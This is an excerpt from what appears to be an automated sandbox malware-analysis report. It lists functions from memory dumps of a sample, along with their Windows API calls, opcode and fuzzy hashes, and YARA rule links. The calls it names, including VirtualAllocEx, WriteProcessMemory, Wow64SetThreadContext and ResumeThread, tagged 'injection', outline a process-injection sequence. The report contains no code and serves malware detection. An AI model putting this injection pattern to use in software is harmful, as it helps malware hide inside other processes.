Opcode Fuzzy Hash: df4e467d63e7b1a24c998d03957d15f1a3a86edb8880b918108a0f453805d6e0
Instruction Fuzzy Hash: 725165B49002099FDB15DFAAD548BEEBBF1FF48304F208459E419A7360DB74A984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 04E55DD8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04E55E56
GetCurrentThread.KERNEL32 ref: 04E55E93
GetCurrentProcess.KERNEL32 ref: 04E55ED0
GetCurrentThreadId.KERNEL32 ref: 04E55F29

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: e61c701d5a80bb4fb5bba46bc5cb497f3d855b47dfa3db2b3fbc668698c150b4
Instruction ID: 4983a751a3251ae7916d1b91343a10e6da21b8ffce5e0ccceb13ed9193a631a9
Opcode Fuzzy Hash: e61c701d5a80bb4fb5bba46bc5cb497f3d855b47dfa3db2b3fbc668698c150b4
Instruction Fuzzy Hash: 245164B09002099FDB15DFAAD548BEEBBF1FF48304F208459E419A7360DB74A984CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0943A8B8 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 299
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0943ABC2

Strings

=l, xrefs: 0943A99E

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: AllocVirtual
String ID: =l
API String ID: 4275171209-3078155194
Opcode ID: 6c5555b115cd97699780c6f79ecaff3188f3ad12f8290298a03a6d5f3a374d82
Instruction ID: e19c91fc557e66f3cb2a2a95b3723c19e3edf62fa98875cbfdd30e2e624e9e9b
Opcode Fuzzy Hash: 6c5555b115cd97699780c6f79ecaff3188f3ad12f8290298a03a6d5f3a374d82
Instruction Fuzzy Hash: 3AB1AD70A101698FCB09CF6DC980AAEFBB2EF89310F54C61AE495A7359C774AC41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04E5A5B1 Relevance: 1.8, APIs: 1, Instructions: 342
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 593e9cbbe43987e49f1fb8849bd9b727ba8996952f1e619b2762234eff09665e
Instruction ID: 84b90ead4350da3b6f6dbeb32d5eeb307a0b914dcd8b7bdc54dc33163e2ccfc4
Opcode Fuzzy Hash: 593e9cbbe43987e49f1fb8849bd9b727ba8996952f1e619b2762234eff09665e
Instruction Fuzzy Hash: F9C10C74D052899FCF12CFA4C844AC9BFB1FF0A304F1491EAE548AB222D734A986DF55

Uniqueness

Uniqueness Score: -1.00%

Function 0943AFB4 Relevance: 1.8, APIs: 1, Instructions: 326processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0943B287

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e7551df0759dc06d5321b47f57ceb587f4cf89fe36bc093c259b5916f4b0ee9a
Instruction ID: 1e24cc393ffa9e5430c8350529bf664d3fa1ce8fab7717a25a89a266a4ae48c6
Opcode Fuzzy Hash: e7551df0759dc06d5321b47f57ceb587f4cf89fe36bc093c259b5916f4b0ee9a
Instruction Fuzzy Hash: E2C13570D002699FDB20CFA9C841BEEBBB1FF49304F0095AAE459B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0943AFC0 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0943B287

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cfc05f1c2d0b5769ed82aba3bf01eb76610bbdfda595b88ce66e6467b57cbe3b
Instruction ID: 951d5c69ab7d1390a16217f4df68ed0ff93abf2832e3dab2d8b394e82f064892
Opcode Fuzzy Hash: cfc05f1c2d0b5769ed82aba3bf01eb76610bbdfda595b88ce66e6467b57cbe3b
Instruction Fuzzy Hash: 11C13670D002699FDB20CFA8C841BEEBBB1FF49304F0095AAE459B7250DB749A85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04E53A08 Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04E53C8A

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 665864d1a8eac029fff1823513edb8b7aa44d57ce15a448215fe646be973902e
Instruction ID: d47bc03d5f4fcf12165b6056f3d109779b988b36b41db037dfcbc78553915389
Opcode Fuzzy Hash: 665864d1a8eac029fff1823513edb8b7aa44d57ce15a448215fe646be973902e
Instruction Fuzzy Hash: C9A14470A007489FDB25CF69D480A9ABBF1FF48344F14996AD886EB760D734E845CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04E5A710 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 04E5A8D1

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e193642d445c38813cebdc1e24356c5befcbefa0b5bded6b85515af967821cb7
Instruction ID: 8f605c8e615e324cc21054fb424135e5e65337b7fa47d1f770fdae00b0ed6291
Opcode Fuzzy Hash: e193642d445c38813cebdc1e24356c5befcbefa0b5bded6b85515af967821cb7
Instruction Fuzzy Hash: 16717CB4D00218DFDF20CFA9D984BDDBBB1BF09304F1091AAE858A7221D730AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0273C884 Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0273DE41

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 5e14178e3a228a94e43c307e182717aef1a39351eeb11de72eb9fd52d6479d2b
Instruction ID: 79494c1964a75d911a87a4c9b50dac85a5075101de81ca8e59ad6d4c0ddca1c5
Opcode Fuzzy Hash: 5e14178e3a228a94e43c307e182717aef1a39351eeb11de72eb9fd52d6479d2b
Instruction Fuzzy Hash: 0551F571D0021CDFDB21CFA8C944B9EBBF5AF49304F1080AAD508BB221DB756A89CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0943AC34 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0943AD0B

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 02eb6d18e7889ffb55d03610c210e1f44729536ed17f20659d78f39b60d4fd2c
Instruction ID: dafd74517f41c0193c6d950e718d163e0877c57fa8a570b93dde350eb9762f4d
Opcode Fuzzy Hash: 02eb6d18e7889ffb55d03610c210e1f44729536ed17f20659d78f39b60d4fd2c
Instruction Fuzzy Hash: 7B41BBB4D012589FCF10CFA9D984ADEFBF1BB49310F20942AE858B7210C335AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0943AC38 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0943AD0B

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f009bae520180deeb8b7b20f0bf536b4a2edb264a9ea7254e9ee917128527373
Instruction ID: 9014bd2a7c446961707a82627843e74cac848ed2958a22cffca1e3d955b73ba1
Opcode Fuzzy Hash: f009bae520180deeb8b7b20f0bf536b4a2edb264a9ea7254e9ee917128527373
Instruction Fuzzy Hash: 0A41AAB5D012589FCF10CFA9D984ADEFBF1BB49310F24942AE858B7210D739AA45CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04E56019 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04E560EB

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: d4077c72224dd33d0f34f08d151615f09ead0cf8006fd8e9307ad0f2ce8a2a19
Instruction ID: 5ba26ec1d8e83e0381054367e4c6993b33afc2c06a44df60b0a91144aa9b44b4
Opcode Fuzzy Hash: d4077c72224dd33d0f34f08d151615f09ead0cf8006fd8e9307ad0f2ce8a2a19
Instruction Fuzzy Hash: B94146B9D002589FCF10CFA9D984ADEBBF5BB09310F24906AE918BB321D335A955CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0943AD88 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0943AE42

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 2f54a9725257afcc7cc32b573c673d17290a64a487e4b1d466cce3542d2dfc9a
Instruction ID: ed71295aaf5b6de718750456d8bc832316f0bcf7ed7dee3bdfb105663d43fb8f
Opcode Fuzzy Hash: 2f54a9725257afcc7cc32b573c673d17290a64a487e4b1d466cce3542d2dfc9a
Instruction Fuzzy Hash: DF41A8B5D00258DFCF14CFAAD881AEEFBB1BB59310F20942AE815B7210C735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 04E56020 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04E560EB

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7946289f41d0855a355c25c606ec6f966d953b73d0ec6bdac983aa800e93438b
Instruction ID: 768435cc299d828da77ab4dfb686f4270a5ec1fb69d30b725a991bb26fd09cb1
Opcode Fuzzy Hash: 7946289f41d0855a355c25c606ec6f966d953b73d0ec6bdac983aa800e93438b
Instruction Fuzzy Hash: 004156B9D002589FCF10CFA9D984ADEBBF5BB09310F24906AE918BB321D335A955CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0943AB10 Relevance: 1.6, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0943ABC2

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 66a23b42cb5a9f1f7e98b093484acbfbf033dacc061e0c01022d24a2fb8e3d6f
Instruction ID: 97a5edbd76febd7b506333a86787511bf79d6be8924a5ac5c5527eb2499359ea
Opcode Fuzzy Hash: 66a23b42cb5a9f1f7e98b093484acbfbf033dacc061e0c01022d24a2fb8e3d6f
Instruction Fuzzy Hash: D93198B8D002589FCF10CFA9D984ADEFBB5BB49310F20942AE915B7210D735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0943AD90 Relevance: 1.6, APIs: 1, Instructions: 106COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0943AE42

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: fc96778d013f92d1a60c6db9c5239a25cd46f9476b99770cd7fda400b0f635be
Instruction ID: f222066fb17253d01b8136890a922b25a6df8338ab998ff76bd8c4b28132c772
Opcode Fuzzy Hash: fc96778d013f92d1a60c6db9c5239a25cd46f9476b99770cd7fda400b0f635be
Instruction Fuzzy Hash: 3141A7B5D00258DFCF10CFAAD880AEEFBB1BB49310F20942AE814B7210D735A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 027384E0 Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0273858F

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d64172cfd4ba5047cea5a55f0c1db82ef1ff8337ff3686a0fdbfc74ea2512e34
Instruction ID: 8dca504bbe1273a858bba26e80f5286bdfaf142de1fb2bcf3b0726088262b85c
Opcode Fuzzy Hash: d64172cfd4ba5047cea5a55f0c1db82ef1ff8337ff3686a0fdbfc74ea2512e34
Instruction Fuzzy Hash: 143199B9D00258DFCB10CFA9E584AEEFBB1BB59310F24902AE854B7210D375A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 04E53700 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04E53FB2

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c366a0aa13f7a702bfb5d0194900faabe37039c3ee0ccb4a2887addcbf82187b
Instruction ID: 4711d281b4df6aa719a17226882e138647c0cf486fa61f27113c93f146a491b2
Opcode Fuzzy Hash: c366a0aa13f7a702bfb5d0194900faabe37039c3ee0ccb4a2887addcbf82187b
Instruction Fuzzy Hash: FE4178B4D042589FCB10CFAAD584ADEFBF1BB49314F14902AE914B7320D335A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 04E59C04 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04E5CF41

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 9ddd5f19d020e4a606f26702d9efd35d093c819c19e3248c07c47ef9f576913c
Instruction ID: 9273a22a270ff1be0ed586a6055cbaada433acf169a3be8f743ad206ac6c3c0f
Opcode Fuzzy Hash: 9ddd5f19d020e4a606f26702d9efd35d093c819c19e3248c07c47ef9f576913c
Instruction Fuzzy Hash: 714147B4A00309DFDB14CF99C498AAABBF5FB88314F24C459E519AB321D734A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E53F00 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 04E53FB2

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 742f38c62fec552694d33ed980f46296a4761ca7f7b0510ea8a0a02f9035ef17
Instruction ID: 22dab7d850d6e7a20677051f6df9957393b482f78daf3d470a2551616abb6a2c
Opcode Fuzzy Hash: 742f38c62fec552694d33ed980f46296a4761ca7f7b0510ea8a0a02f9035ef17
Instruction Fuzzy Hash: 184187B9D002599FCB10CFAAD984ADEFBF5BB09314F14902AE818B7220D334A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0943A788 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0943A83F

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a2eb1000296b1290726b29ad4fae4faaa270f4d53aadd72f21e6da765197adb0
Instruction ID: bd3ee6fa792fd31a5a2955bc63ca3a81dbda160c5074f931172fcd72378fdae8
Opcode Fuzzy Hash: a2eb1000296b1290726b29ad4fae4faaa270f4d53aadd72f21e6da765197adb0
Instruction Fuzzy Hash: 2641DEB4D00258DFCB14CFAAD484AEEFBF1BB49310F64842AE454B7200C738A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 027384E8 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0273858F

Memory Dump Source

Source File: 00000000.00000002.1670262015.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2730000_22#U0415.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9845ace97eebe170ca34ecea6a7169dd756a54d32f024dc41b0a24f139711831
Instruction ID: 4d334a4d3b647799e1cf3f538c84cbd20c129b01fe4870eab2dc704368ae4405
Opcode Fuzzy Hash: 9845ace97eebe170ca34ecea6a7169dd756a54d32f024dc41b0a24f139711831
Instruction Fuzzy Hash: 393188B9D04258DFCB10CFAAD984ADEFBF1BB19310F24902AE854B7210D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0943A790 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 0943A83F

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 919597d012fb7bfd91e540c60fdef4b8a77249fcd905cffafb31a4e1d0418f68
Instruction ID: 8ad8b8f7ef698bf6e17c77592ad969d3f1c533c58d606ce37db291624a94ba03
Opcode Fuzzy Hash: 919597d012fb7bfd91e540c60fdef4b8a77249fcd905cffafb31a4e1d0418f68
Instruction Fuzzy Hash: 6531CDB4D002589FCB14CFAAD884AEEFBF0BF49314F64842AE454B7240C738A985CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0943D779 Relevance: 1.6, APIs: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0943D81B

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6e5ec3e6dbdb8a7168413fca27dcf3d1603fbf679f4d50b294faf3ce5876ff57
Instruction ID: b20aa4a6e78beae479eeb65cf0693207f9d36c3517ea4a608dde44ad8a77805a
Opcode Fuzzy Hash: 6e5ec3e6dbdb8a7168413fca27dcf3d1603fbf679f4d50b294faf3ce5876ff57
Instruction Fuzzy Hash: 7F318AB8D01258AFCB14CFA9D584ADEFBF5AB59310F24902AE828B7310D375A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0943B94C Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,00000000), ref: 0943D81B

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 073aba296432d680f02a77299dbd570f59b00883692b57b9f3cf18dc9c6f4700
Instruction ID: 0bc04a53ff7c8a1f88d01277f9750e7c7f7d828472bfa18c383c691c9c0ad5d5
Opcode Fuzzy Hash: 073aba296432d680f02a77299dbd570f59b00883692b57b9f3cf18dc9c6f4700
Instruction Fuzzy Hash: F7318AB8D04258EFCB14CFA9D584ADEFBF4AB09310F14902AE828B7310D375A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 04E53BF8 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04E53C8A

Memory Dump Source

Source File: 00000000.00000002.1672803184.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e50000_22#U0415.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 34c4f19e385b6553e397dd25b534978426c29ef7ea1d561731717999706fbff1
Instruction ID: 76132cd2bf38ad934c178b6ec4e4b421cabcfa244562cb67393d0da4dbb5c8f1
Opcode Fuzzy Hash: 34c4f19e385b6553e397dd25b534978426c29ef7ea1d561731717999706fbff1
Instruction Fuzzy Hash: F93199B4D00259DFCB14CFAAD584ADEFBF5AB49314F24906AE818B7320D334A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0943A698 Relevance: 1.6, APIs: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0943A71E

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 9e987d2b60a9142cd8bf2a31a00e403429ee76ad1fcd7d101d741e5ac1c83355
Instruction ID: c821079ba170f9ca90910c73283cebe1664c43055ab3a15e04bfaed7b4c3ed68
Opcode Fuzzy Hash: 9e987d2b60a9142cd8bf2a31a00e403429ee76ad1fcd7d101d741e5ac1c83355
Instruction Fuzzy Hash: D731CEB4D002189FCF14CFA9D980ADEFBB4AB49310F20942AE454B7310C735A941CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0943A6A0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 0943A71E

Memory Dump Source

Source File: 00000000.00000002.1676431024.0000000009430000.00000040.00000800.00020000.00000000.sdmp, Offset: 09430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9430000_22#U0415.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4c8c5e40ef9bdcd150379ae9ea7d399ae066d93f48152d794e20c702576a0c36
Instruction ID: 745c828a6ccb27b2efe651424c418a8abac8cedbdf960c0bba224e812db0885c
Opcode Fuzzy Hash: 4c8c5e40ef9bdcd150379ae9ea7d399ae066d93f48152d794e20c702576a0c36
Instruction Fuzzy Hash: 1B31AAB4D012589FCB14CFAAD984ADEFBB5AB49310F24942AE855B7310C735A941CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 025BD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669815448.00000000025BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25bd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51475a7f74e370cf72ba8be0c24fdb491dbe5ec2bde79ed695e57e3d670007ef
Instruction ID: 7acdbf608a5cdf2770b0d3ce2ac8a3a6c0ad652da017d285622cf1f468298207
Opcode Fuzzy Hash: 51475a7f74e370cf72ba8be0c24fdb491dbe5ec2bde79ed695e57e3d670007ef
Instruction Fuzzy Hash: 1D212271500240DFDB06DF14D9C0B6ABFB5FF88318F20C569E8090B296C33AD856CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 025CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669876939.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25cd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c17dd37ff99828706a22733f344f63aad8eabeb551b7fcbb11c740b4d6f73a94
Instruction ID: a5d39ac38fb1e3b4a8b957a7d4ed948cdfc01cd85a46eb0a508c00b09aea3544
Opcode Fuzzy Hash: c17dd37ff99828706a22733f344f63aad8eabeb551b7fcbb11c740b4d6f73a94
Instruction Fuzzy Hash: C721FF75604200DFDB14DF58D984B26BFB5FB84324F30C97DD80A9B256E33AD446CA65

Uniqueness

Uniqueness Score: -1.00%

Function 025CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669876939.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25cd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d1bc3ffda48c0dfbb08ba95f8cbe43989de7d14d1ab3b17cef824a8862f2481
Instruction ID: e61cccf95f81f4bb435e4f8d2c5380b334e3245f9abf8a00a6ef956d58bb5f77
Opcode Fuzzy Hash: 4d1bc3ffda48c0dfbb08ba95f8cbe43989de7d14d1ab3b17cef824a8862f2481
Instruction Fuzzy Hash: 2321D071504200EFDB05DF94D984B26BFB5FB88314F30CA7DE84A8B25AD33AD446CA65

Uniqueness

Uniqueness Score: -1.00%

Function 025CD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1669876939.00000000025CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 025CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_25cd000_22#U0415.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29ecbc5234d1a286c002c6e32989e2da6f3e736122139aedde3522325b692a03
Instruction ID: 3760f6ff780bbee6aad834318bff728581e27efe09fd28b1b209d692ea16acdb
